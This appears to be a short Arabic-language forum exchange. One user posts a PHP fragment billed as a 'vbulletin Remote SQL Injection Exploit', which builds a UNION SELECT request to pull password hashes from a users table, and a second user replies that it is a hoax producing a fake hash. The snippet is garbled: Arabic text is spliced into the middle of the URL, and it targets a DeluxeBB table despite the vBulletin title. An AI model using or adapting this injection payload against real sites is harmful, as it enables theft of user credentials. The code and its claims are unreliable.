[loverdo]

vbulletin Remote SQL Injection Exploit
الحرب على الانترنيت بدات



$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0, pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ;

[runvirus]

هذه خدعه اخي سبق ونزلت شرح خدعة هذه الثغره فاهي تقوم بعمل HASH وهمي تخدع المخترق انه تمكن من الحصول علي باسورد الموقع وطبعا script kiddz مش فاهم وفرحان انه حصل علي باسورد الموقع :]